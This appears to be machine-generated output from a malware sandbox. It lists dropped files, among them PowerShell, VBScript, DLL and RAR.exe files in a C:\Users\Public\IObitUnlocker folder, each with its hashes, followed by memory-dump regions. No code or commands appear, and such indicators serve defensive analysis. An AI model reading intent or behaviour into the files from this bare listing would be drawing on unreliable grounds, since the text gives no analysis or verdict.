bbd176d8b6b46aa70a323e506a7d6ce671d14b79fc344cb0c4c8433ab761c9a7f6d2feed247276cda5503b6be529bd2e57c040a177725cc6ae7c100d76285e1f

Download Submit
C:\Users\Public\IObitUnlocker\EN.dll

Filesize
95KB

MD5
d4793b21ec5937b74e6d9294428c52c9

SHA1
1c503c39fcbb2d76976eed31c220cef3b4883331

SHA256
60e8c2d4845358f86538d70f60e51eae2d98320cf5053632b181f5da08f6b8e6

SHA512
0ac97674a634d1ae93588172bc13b972371092714dcd30afc5048d2b06ce956efecda489a60644d22cf4e816e6f8f6b768a3426ba6404a737d1ce293fa31fd91

Download Submit
C:\Users\Public\IObitUnlocker\HKCU.ps1

Filesize
451B

MD5
61784c5b761fd222f9fc4cd0aad1ce94

SHA1
ede36fbb733f67c2059dd9e6744f5a58913c139b

SHA256
c3b21f00fb1451aae184e534311bd368b5677b61da75e52df7c9dbad7bcf5be0

SHA512
76eeb2c26f0b36e56ac85b551410104ed3f5ca73a814af486f87ee213e86d57750a5c1546c77b49954f42aff9af631eca78de2e6cfa7dc8f700a7d06c16a023f

Download Submit
C:\Users\Public\IObitUnlocker\Lan.vbs

Filesize
432B

MD5
023fb285bf9850ccc10287a3a8db3603

SHA1
7f07762fad599cd96c903e7f279ff06607db667a

SHA256
1fe2373734955e60c172999142934b52e69ba7ab9039b3c18ea54082ba32afcd

SHA512
18464264cdad2a1853715161bb0a38d2a85f5e62f223e3c278d3aa68345850edbafa3f5770b5bd83354991cab8b39837ca06bb3437b32097ebdf3eee5ad3a12f

Download Submit
C:\Users\Public\IObitUnlocker\Loader.vbs

Filesize
308B

MD5
2993b76e0b0ba015caf654881638a0c0

SHA1
7fbd5f28fb2f6f948cbeb3c4dd5b0672bdfe4bcd

SHA256
0e131f595ef67c160de9727d9a92a84b50393e66dd242f330736b916e1bf20a3

SHA512
a61e0e7f92f0d78c27939ba21bdda6ff97503adc44e42a4b7eab3c4c1bea8acad4517b90db3430cabc237c2db01e60ab3a2a78e237ae01a896bd09aabba067cb

Download Submit
C:\Users\Public\IObitUnlocker\RAR.exe

Filesize
629KB

MD5
d3e9f98155c0faab869ccc74fb5e8a1e

SHA1
8e4feaad1d43306fdd8aa66efa443bca7afde710

SHA256
3e0fdb5c40336482dacef3496116053d7772a51720900141b3c6f35c6e9b351b

SHA512
2760c139ef276f406770675d89fb667f3369a9e1943a6eff2c18f391114018ad6fdce9daf0b499b18081ef22243ef04d74ff21cbd346eb31a1ddbcb79756697d

Download Submit
C:\Users\Public\IObitUnlocker\RAR.exe

Filesize
629KB

MD5
a0dafda5ec1ac16a9667ec673214eae0

SHA1
d51b6b9482030d0d1784976f71d7429adf7c5e01

SHA256
e91a84a11d3048cbc9e6e75f07eec743de686dd91153bec5fe426cf327039025

SHA512
5ccdd94a09206164ad48c5eda66689574d75afeb49b7a2ef3e73dcdc978ec0b173af7cb9cef3f2b53c00133f05e3950dd2d9587092d43390b0766f0a8b48f148

Download Submit
C:\Users\Public\IObitUnlocker\RU.dll

Filesize
327B

MD5
83bf9ba8becac139cb05c1ab68468e62

SHA1
8fab7c51fb2a340af6ed6cd03e1c546479e14239

SHA256
7bfd69bdd83904d39a4e09c55fe6e380f027a2f13593c167acf92160bb9cf125

SHA512
b3f19d613db7067cfc87c6c7e341f189c99fe1849ee67f18b4b63d65b6299612cd1c935fb713f274dfaf837b5dee17bde20f04e8682f85d75f42b1838ee04f04

Download Submit
C:\Users\Public\IObitUnlocker\Report.ps1

Filesize
458KB

MD5
0ad042427660b11cca79d546de7d7004

SHA1
f2e9457d805c80915ca4c7e6031a326a881a956c

SHA256
56b1807543175fece178e45526226d6ceb2fb8674238bfdde7d21aee3e9c302c

SHA512
370fd35d60869c5f902a1c631f4bf0e29fe249ade765261410d9a35f0d854cabcc343e9f82a7c9aa7ab49650338d2faeee34698839ca84f15937f62f0aa8d96b

Download Submit
C:\Users\Public\IObitUnlocker\UK.dll

Filesize
5KB

MD5
615bf7d2dcc78514bcab13af644048a7

SHA1
9aec4464097e468f488247486a65e6fa2cc9bd54

SHA256
85a63cfa374af7b8493a0ca9ae19908f8b88cc702e5db1371361d9549778399f

SHA512
63fec543feb283f309ec01c176b9b62c1e1033e861711a115d77157a7f42fb204dbeade9b96b892050d676d7f4f6ff1dc32c9cc66840e4aa772173c10afd579e

Download Submit
C:\Users\Public\IObitUnlocker\Win.ps1

Filesize
6KB

MD5
7cac76a8517a50e2972a49412f6d8322

SHA1
7c739c6cdbb2266f1349ac6d4105c054e0f3ac23

SHA256
04c36687638947852d85d508dd255c6aea6cb8a53e94067bed7e8c976f75725e

SHA512
e63a55b7f2c8a384807be77cc349c57bf6f39dd2f9f0b237957b7797ff4ef40da6d641c910346bb4ee511680a77ffd2725e9960e738841ece5fe6dd410f3b81a

Download Submit
C:\Users\Public\IObitUnlocker\diagerr.xml

Filesize
1KB

MD5
5c7edf49e355d46cfc4c94efe1d157b6

SHA1
fab78dd9e673f3726894bf79f6821c1fc8c685e6

SHA256
58d64002cfa1b8f4f833357c1a4b769fb0881b100e80581c5ca3d8ae5681e89e

SHA512
72043194dd3f861128e0c27d542a67ec8597b70c120c989aaf8967113147422d723626513c2e2f3df6ae82f27f936047e6d33de2b3bd714e5b2be6b2c06f7f21

Download Submit
C:\Users\Public\IObitUnlocker\done.reg

Filesize
250B

MD5
ff047b633dfa3af4e5b5c78c1c84515b

SHA1
edca05a1a23484322da3932074af30de93d4c041

SHA256
963e9de4561957e19eb200c7446aaba4e59392040eaa5006717bf826a589cc21

SHA512
3e0f46a9c8626a6f53e710676b42802f014f9bac8dbb1af58e42c3e1f7df80ca074e137d4b98fa5739b07028f11eed7f569b55232a2c85dd5d8a7b23dc8420d3

Download Submit
C:\Windows\Logs\DISM\dism.log

Filesize
285KB

MD5
fd3447db41f5769c35fd60c46c882071

SHA1
d0816ffa980f5a506da8bdf7452478a92c9480cf

SHA256
3e2d2e3ef4aeab037ef1755c10f4c4a76b2039f2a14f8f30ee2cf691094903d7

SHA512
bf7e82cd88ca45ae81f1e8ff59fa8eff4d950b428e22acfd16aefd4cf4da15c38bb8ff4291035e63710344945cf96a099e4d9efa236a8fa19175e67d23bfc5b8

Download Submit
C:\Windows\Logs\DISM\dism.log

Filesize
288KB

MD5
3052ecfab542e90545da2b9649202552

SHA1
bd77bbecb5063b6058da7a62fd2d2622951e94bf

SHA256
86b1257df2bf60c69057ee8f4441166adb4bf9326cdb019dd92f8944e59b0719

SHA512
fb8a274f0197ed4d0dbf0c5ca04e8780e0b2cbcb893cf5f5fe1828896ca6a2e79060230840e851ff3409ce1929a14c72272888c4b453363376b4eadf046d8cba

Download Submit
memory/404-825-0x000001E2C8AF0000-0x000001E2C8BD6000-memory.dmp

Filesize
920KB

Download
memory/572-80-0x000001EB79B70000-0x000001EB79B78000-memory.dmp

Filesize
32KB

Download
memory/572-78-0x000001EB79080000-0x000001EB7913A000-memory.dmp

Filesize
744KB

Download
memory/572-77-0x000001EB78F10000-0x000001EB78FC2000-memory.dmp

Filesize
712KB

Download
memory/572-72-0x000001EB5DF50000-0x000001EB5DF58000-memory.dmp

Filesize
32KB

Download
memory/572-71-0x000001EB768E0000-0x000001EB76906000-memory.dmp

Filesize
152KB

Download
memory/572-70-0x000001EB76800000-0x000001EB768E6000-memory.dmp

Filesize
920KB

Download
memory/572-69-0x000001EB5C0E0000-0x000001EB5C1D4000-memory.dmp

Filesize
976KB

Download
memory/572-73-0x000001EB5DF60000-0x000001EB5DF6A000-memory.dmp

Filesize
40KB

Download
memory/572-82-0x000001EB79B90000-0x000001EB79B9E000-memory.dmp

Filesize
56KB

Download
memory/572-79-0x000001EB78FC0000-0x000001EB78FF8000-memory.dmp

Filesize
224KB

Download
memory/2332-971-0x0000000008890000-0x0000000008906000-memory.dmp

Filesize
472KB

Download
memory/2332-974-0x0000000008B20000-0x0000000008B2A000-memory.dmp

Filesize
40KB

Download
memory/2332-430-0x0000000005700000-0x000000000570A000-memory.dmp

Filesize
40KB

Download
memory/2332-433-0x0000000006830000-0x00000000068CC000-memory.dmp

Filesize
624KB

Download
memory/2332-434-0x0000000006D90000-0x0000000006DF6000-memory.dmp

Filesize
408KB

Download
memory/2332-428-0x0000000005BE0000-0x0000000006186000-memory.dmp

Filesize
5.6MB

Download
memory/2332-981-0x0000000009710000-0x0000000009722000-memory.dmp

Filesize
72KB

Download
memory/2332-979-0x0000000009670000-0x00000000096BC000-memory.dmp

Filesize
304KB

Download
memory/2332-978-0x00000000092E0000-0x0000000009637000-memory.dmp

Filesize
3.3MB

Download
memory/2332-977-0x0000000008C90000-0x0000000008CF0000-memory.dmp

Filesize
384KB

Download
memory/2332-973-0x0000000008840000-0x000000000885E000-memory.dmp

Filesize
120KB

Download
memory/2332-972-0x0000000008D10000-0x00000000091E4000-memory.dmp

Filesize
4.8MB

Download
memory/2332-976-0x0000000008BB0000-0x0000000008C40000-memory.dmp

Filesize
576KB

Download
memory/2332-429-0x0000000005720000-0x00000000057B2000-memory.dmp

Filesize
584KB

Download
memory/2332-975-0x0000000008BA0000-0x0000000008BAA000-memory.dmp

Filesize
40KB

Download
memory/3896-5-0x00000176E1F10000-0x00000176E1F32000-memory.dmp

Filesize
136KB

Download
memory/4264-423-0x0000000000400000-0x0000000000416000-memory.dmp

Filesize
88KB

Download
memory/4264-768-0x0000000140000000-0x000000014017D000-memory.dmp

Filesize
1.5MB

Download
memory/4264-576-0x0000000140000000-0x000000014017D000-memory.dmp

Filesize
1.5MB

Download
memory/4284-422-0x0000029AD1990000-0x0000029AD199A000-memory.dmp

Filesize
40KB

Download